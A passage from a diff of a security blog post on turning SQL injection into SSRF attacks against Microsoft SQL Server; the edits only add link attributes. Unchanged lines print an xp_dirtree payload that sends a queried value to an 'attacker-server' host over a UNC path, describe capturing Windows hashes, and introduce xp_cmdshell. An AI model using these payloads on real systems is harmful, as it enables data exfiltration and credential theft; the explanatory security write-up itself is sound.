riyazwalikar/ibreak.software/content/post/using-sql-injection-to-perform-ssrf-xspa-attacks.md

 EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
 ```

 Much like MySQL's `LOAD_FILE`, you can use `xp_dirtree` to make a network request to only TCP port 445.
 You cannot control the port number, but can read information from network shares.
-Addtionally, much like any UNC path access, <a href="https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478" target="_blank">Windows hashes will be sent over to the network that can be captured and replayed for further exploitation</a>.
+Addtionally, much like any UNC path access, <a href="https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478" target="_blank" rel="noopener noreferrer">Windows hashes will be sent over to the network that can be captured and replayed for further exploitation</a>.

 **PS:** This does not work on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` running on a `Windows Server 2016 Datacenter` in the default config.

-There are other stored procedures <a href="https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx" target="_blank"> like `master..xp_fileexist` </a>etc. as well that can be used for similar results.
+There are other stored procedures <a href="https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx" target="_blank" rel="noopener noreferrer"> like `master..xp_fileexist` </a>etc. as well that can be used for similar results.

 ### master..xp_cmdshell

-The extended stored procedure <a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql" target="_blank">`xp_cmdshell` spawns a Windows command shell and executes the string passed to it, returning any rows of text</a>.
+The extended stored procedure <a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql" target="_blank" rel="noopener noreferrer">`xp_cmdshell` spawns a Windows command shell and executes the string passed to it, returning any rows of text</a>.
 This command is run as the SQL Server service account.

 `xp_cmdshell` is disabled by default.
 You can enable it using the SQL Server Configuration Option.
 Here's how